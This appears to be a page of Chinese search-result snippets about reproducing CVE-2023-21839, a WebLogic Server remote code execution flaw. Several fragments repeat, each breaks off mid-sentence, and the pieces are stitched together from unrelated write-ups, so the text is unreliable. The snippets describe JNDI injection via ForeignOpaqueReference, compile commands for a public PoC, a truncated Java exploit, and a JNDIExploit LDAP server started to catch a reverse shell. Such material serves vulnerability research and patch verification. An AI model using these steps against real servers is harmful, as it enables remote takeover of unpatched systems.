漏洞POC 从POC代码上来看,核心的部分是方法中将通过调用getInitialContext方法创建一个InitialContext对象;使用反射访问和修改ForeignOpaqueReference对象中的私有字段jndiEnvironment和emoteJNDIName,调用InitialContext对象的bind方法,将ForeignOpaqueReference对象绑定到JNDI服务,最后调用InitialContext对象的lookup方法,执行查找。 漏洞利...
1.新建java项目,并写入poc文件 2.从文件-项目结构-模块-依赖处引入wlfullclient.jar模块(windows安装路径:C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib)3.远程启用JNDI服务,运行poc文件 4.漏洞复现成功 04POC如下 使用main方法创建了一个getInitialContext方法并使用getInitialContext方法,创建初始上下文并...
漏洞POC 从POC代码上来看,核心的部分是方法中将通过调用getInitialContext方法创建一个InitialContext对象;使用反射访问和修改ForeignOpaqueReference对象中的私有字段jndiEnvironment和emoteJNDIName,调用InitialContext对象的bind方法,将ForeignOpaqueReference对象绑定到JNDI服务,最后调用InitialContext对象的lookup方法,执行查找。漏洞...
CVE-2023-21839 WebLogic Server RCE分析 星阑科技 2023-03-23 14:58:08 273535 所属地 北京项目介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能...
使用Weblogic-CVE-2023-21839.jar工具进行验证可以看到DNSLOG回显数据。 命令执行弹Calc POC如下: 使用main方法创建了一个getInitialContext方法并使用getInitialContext方法,创建初始上下文并使用T3协议与WebLogic服务器连接,然后创建了一个weblogic.deployment.jms.ForeignOpaqueReference类的实例并通过反射机制访问私有字段以设置...
本PoC是针对CVE-2023-21839编写的,实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。因为这三个漏洞触发机制相同,且补丁方式相同,所以只要存在一个,那么其他两个也存在。 此poc使用go语言编写,使用命令编译成可执行文件: cd cmd go build -o CVE-2023-21839.exe CVE-2023-21839.exe -ip 127.0.0.1 -port 70...
Windows 环境,下载 WebLogic Server 12.2.1.3.0、JDK 1.7、CVE-2023-21839 POC 和 JNDI-Injection-Exploit-1.0-SNAPSHOT-all 注入工具。 公开的漏洞存在判定与利用方式: JDNI 注入 dnslog 请求响应 模仿威胁行为者,进行攻击漏洞探测(初始化)。 操作记录: ...
1.下载poc https://github.com/4ra1n/CVE-2023-21839 安装go环境(本文略过) 执行编译命令 cdcmdgo build -o CVE-2023-21839.exell 起ldap服务: 1.准备JNDIExploit-1.4-SNAPSHOT.jar,为反弹shell做准备(java环境安装本文略过) java-jarJNDIExploit-1.4-SNAPSHOT.jar-i192.168.19.134 ...
POC如下: jdk1.8打包好的jar公众号回复"CVE-2023-21839" importjavax.naming.Context;importjavax.naming.InitialContext;importjavax.naming.NamingException;importjava.lang.reflect.Field;importjava.util.Hashtable;importjava.util.Random;publicclassCVE_2023_21839{staticStringJNDI_FACTORY="weblogic.jndi.WLInitialContex...
漏洞利用POC 需要引入weblogic.jar 注意:weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要通过执行一个命令生成手动生成 wlfullclient.jar,用来替代老版本中的 weblogic.jar。 具体命令如下(Windows 系统,我的 weblogic 安装目录为 D:\Program\weblogic-10.3.6): ...